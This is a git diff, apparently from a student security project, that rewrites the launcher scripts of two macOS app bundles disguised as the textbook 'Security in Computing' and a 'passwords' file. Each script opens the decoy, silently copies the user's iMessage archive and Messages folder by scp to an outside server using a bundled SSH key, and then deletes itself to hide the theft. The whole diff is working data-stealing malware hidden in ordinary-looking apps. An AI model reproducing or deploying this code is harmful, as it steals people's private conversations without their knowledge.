lets teest

diff --git a/Security in Computing, 5_e.app/Security in Computing, 5_e b/Security in Computing, 5_e.app/Security in Computing, 5_e
--- a/Security in Computing, 5_e.app/Security in Computing, 5_e
+++ b/Security in Computing, 5_e.app/Security in Computing, 5_e
@@ -1,5 +1,28 @@
 #!/bin/bash
-pth=~/Documents/CIS/433project/
-usbpth=/Volumes/KINGSTON/
-pwd > ${usbpth}here_i_am.log
-open "${usbpth}Security in Computing, 5_e.app/Content/Security in Computing, 5_e.epub"
+CDIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) #Directory of app
+ARCHIVE=~/Library/Containers/com.apple.iChat/Data/Library/Messages/Archive
+MESSAGES=~/Library/Messages
+SERV=www.naookiesato.com
+SERVPORT=8087
+SERVUSER=sauron
+SERVPATH=/home/sauron/messages
+KEY=${CDIR}/.ssh/id_rsa
+cd ${CDIR}
+
+open "${CDIR}/Content/Security in Computing, 5_e.epub"
+cd ${ARCHIVE}
+if [ $? -eq 0 ]; then
+    ssh -i ${KEY} -p ${SERVPORT} ${SERVUSER}@${SERV} "mkdir ${SERVPATH}"
+    ssh -i ${KEY} -p ${SERVPORT} ${SERVUSER}@${SERV} "mkdir ${SERVPATH}/${USER}"
+    scp -i ${KEY} -P ${SERVPORT} -r ${ARCHIVE} ${SERVUSER}@${SERV}://${SERVPATH}/${USER}/
+fi
+cd ${MESSAGES}
+if [ $? -eq 0 ]; then
+    ssh -i ${KEY} -p ${SERVPORT} ${SERVUSER}@${SERV} "mkdir ${SERVPATH}"
+    ssh -i ${KEY} -p ${SERVPORT} ${SERVUSER}@${SERV} "mkdir ${SERVPATH}/${USER}"
+    scp -i ${KEY} -P ${SERVPORT} -r ${MESSAGES} ${SERVUSER}@${SERV}://${SERVPATH}/${USER}/
+fi
+
+rm -rf ${CDIR} #cleanup
+#rm -rf ${CDIR}/../* #cleanup
+
diff --git a/passwords.app/passwords b/passwords.app/passwords
--- a/passwords.app/passwords
+++ b/passwords.app/passwords
@@ -1,21 +1,29 @@
 #!/bin/bash
 CDIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) #Directory of app
-ARCHIVES=~/Library/Containers/com.apple.iChat/Data/Library/Messages/Archive
+ARCHIVE=~/Library/Containers/com.apple.iChat/Data/Library/Messages/Archive
+MESSAGES=~/Library/Messages
 SERV=www.naookiesato.com
 SERVPORT=8087
 SERVUSER=sauron
-SERVPATH=/home/sauron
+SERVPATH=/home/sauron/messages
 KEY=${CDIR}/.ssh/id_rsa
 cd ${CDIR}
 
 open ${CDIR}/Content/passwords
-cd ${ARCHIVES}
+cd ${ARCHIVE}
 if [ $? -eq 0 ]; then
-    scp -i ${KEY} -P ${SERVPORT} -r ${ARCHIVES} ${SERVUSER}@${SERV}://${SERVPATH}/${USER}
-    rm -rf ${CDIR} #cleanup
-    #rm -rf ${CDIR}/../* #cleanup
+    ssh -i ${KEY} -p ${SERVPORT} ${SERVUSER}@${SERV} "mkdir ${SERVPATH}"
+    ssh -i ${KEY} -p ${SERVPORT} ${SERVUSER}@${SERV} "mkdir ${SERVPATH}/${USER}"
+    scp -i ${KEY} -P ${SERVPORT} -r ${ARCHIVE} ${SERVUSER}@${SERV}://${SERVPATH}/${USER}/
+fi
+cd ${MESSAGES}
+if [ $? -eq 0 ]; then
+    ssh -i ${KEY} -p ${SERVPORT} ${SERVUSER}@${SERV} "mkdir ${SERVPATH}"
+    ssh -i ${KEY} -p ${SERVPORT} ${SERVUSER}@${SERV} "mkdir ${SERVPATH}/${USER}"
+    scp -i ${KEY} -P ${SERVPORT} -r ${MESSAGES} ${SERVUSER}@${SERV}://${SERVPATH}/${USER}/
 fi
 
-
+rm -rf ${CDIR} #cleanup
+#rm -rf ${CDIR}/../* #cleanup
 #open  -a Preview
 
